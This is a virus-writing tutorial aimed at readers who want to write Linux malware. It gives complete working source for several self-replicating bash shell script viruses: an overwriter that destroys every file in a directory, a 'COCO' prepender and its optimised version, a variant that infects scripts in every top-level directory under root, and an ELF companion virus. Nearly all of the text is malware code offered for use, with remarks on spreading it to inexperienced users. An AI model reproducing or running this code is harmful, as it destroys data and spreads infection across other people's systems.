Linux Shell Script Viren by SnakeByte [ SnakeByte@kryptocrew.de ] www.kryptocrew.de/snakebyte Nowadays as Linux becomes more and more popular, every linux user starts telling me that there are no viruses for his loved os. After a long discussion most of them believe me, that it is possible to write a virus for Linux, but its harder for them to spread, because Linux takes more care of acess rights than Dos or Windows ( there are none *g* ) Ok, there are ELF Infectors out, which carry exploits to gain root, but here I want to talk about more simple viruses, which could also be able to spread, once there are more lamers using Linux ( and at the moment their number grows ) My opinion is, that Viruses will also be a problem for Linux in the future, because there is more and more commercialism and with commercial products come a lot of unexperienced users which do not know how to keep their system clean. Another reason why I deal with Shell Script Viruses here is, that the bash shell script is running on most systems and so we don't have to fear incompatibility. ( I don't know how far the scripts presented here are compatible to C or another shell, if anyone tests this, please let me know ;) ) Shell Scripts are like batch files in the good old days of dos, or like VBScript in Windows. They allow the programmer to make routine jobs more easier and faster. The Scripts get interpreted by the shell and are very powerful. Contrary to DOS, you will find a lot of shell scripts when taking a look at Linux. Shell Scripts are for example : /etc/profile, /etc/csh.cshcshrc. some files in /etc/rc.d, files to configure the firewall and many more. For all Linux Newbies : 'vi' is an editor you could use to write these simple scripts ( and don't believe anyone who tells you, that emacs or joe are better *g* ). Use 'chmod +rwxrwxrwx' to make everyone able to read, write and execute the file. To start the script, you simply have to type the filename. ( On some systems you need to place a ./ in front of the filename because the current directory is not inside the path value ) We saw that a shell script virus has a whole potential of possible victims. Let's take a look at the most simple form of a shell script virus : #Overwritter I for file in * do cp $0 $file done This, just a few lines long script, copies itself over every file in the current directory. Of course, this methos of infecting comes with a lot of damage and should be found very fast, so we need to make everything a bit more tricky. #Overwritter II for file in * do if test -f $file then if test -x $file then if test -w $file then if grep -s echo $file >.mmm then cp $0 $file fi; fi; fi; fi; fi done rm .mmm -f Here we included some additional checks for the file we want to infect. First, we check if it is a file at all. Then if it is executable and if we got write access. If the file passed all checks, we search the file for the echo command, which is part of most Shell Scripts ( displays something on the screen ) ( Because we did not get all scripts this way, we could also do a : if file $file | grep -s 'Bourne shell script' > /dev/nul ; then ) Because a shell script does not longer work, after being overwritten, we should think of another infection method. The following code is a prepender i wrote nearly 2 years ago to see if it can be done : # COCO head -n 24 $0 > .test for file in * do if test -f $file then if test -x $file then if test -w $file then if grep -s echo $file >.mmm then head -n 1 $file >.mm if grep -s COCO .mm >.mmm then rm .mm -f else cat $file > .SAVEE cat .test > $file cat .SAVEE >> $file fi; fi; fi; fi; fi done rm .test .SAVEE .mmm .mm -f The # COCO is our infection mark, to see if a file is already infected. ( we check this with if grep -s COCO .mm > .mmm ) After this we have the old checks if the file is a good victim. If the file is ok and not infected yet, we copy it into another, hidden file ( .SAVEE ). Now we replace the original file with the first 24 Lines of our shell script file, which is exactly the virus. ( we save them in .test bevore ) Now we just append the original file to the virus. ( cat .SAVEE >> $file ) Last but not least, we delete every file we created during the infection. Now we can start optimizing. This can be done with two goals : One is to reduce the number of lines, the other on is to reduce the number of temporary files we use. The next code is ( or is nearly, because i lost the original ) the optimized version of COCO, which Antraxx optimized for me some time ago. # COCO ( 2 ? ) for file in * ; do if test -f $file && test -x $file && test -w $file ; then if grep -s echo $file > /dev/nul ; then head -n 1 $file >.mm if grep -s COCO .mm > /dev/nul ; then rm .mm -f ; else cat $file > .SAVEE head -n 13 $0 > $file cat .SAVEE >> $file fi; fi; fi done rm .SAVEE .mm -f Now we just need 2 temporary files and 13 lines of code. Of course could be stick all lines together into one by seperating them with a ; , but this would be unreadable so I will not do this here. What else does a virus need to be effective ? He should not just infect the current directory, but should parse others for victims. ( /etc, /bin, /sbin.. ) In this example we save the current directory first, which is stored in the variable $path. Then we search the root directory for other directories. If we found one, we change into it and search for shell script files. We infect them with the old method and change to root directory afterwards. At the end we return to the original directory and remove the files we created. # COCO 3 xtemp=$pwd head -n 22 $0 > /.test for dir in /* ; do if test -d $dir ; then cd $dir for file in * ; do if test -f $file && test -x $file && test -w $file ; then if grep -s echo $file > /dev/nul ; then head -n 1 $file > .mm if grep -s COCO .mm > /dev/nul ; then rm .mm -f ; else cat $file > /.SAVEE cat /.test > $file cat /.SAVEE >> $file fi; fi; fi done cd .. fi done cd $xtemp rm /.test /.SAVEE .mm -f Not bad for something simple like a shell script, or ? Of course could we also search for specific directorys and add a payload ( Message, expand passwd, ping-flood a host, download a backdoor with ftp, etc.. ), but in this tutorial i will not cover such things. I think it is also possible to use sendmail or any other mail program to send the script around via mail, but as long most people use windows, this would not be very effective. To make this file complete, here is a ELF Compagnion Virus : # Compagnion for file in * ; do if test -f $file && test -x $file && test -w $file ; then if file $file | grep -s 'ELF' > /dev/nul ; then mv $file .$file head -n 9 $0 > $file fi; fi done .$0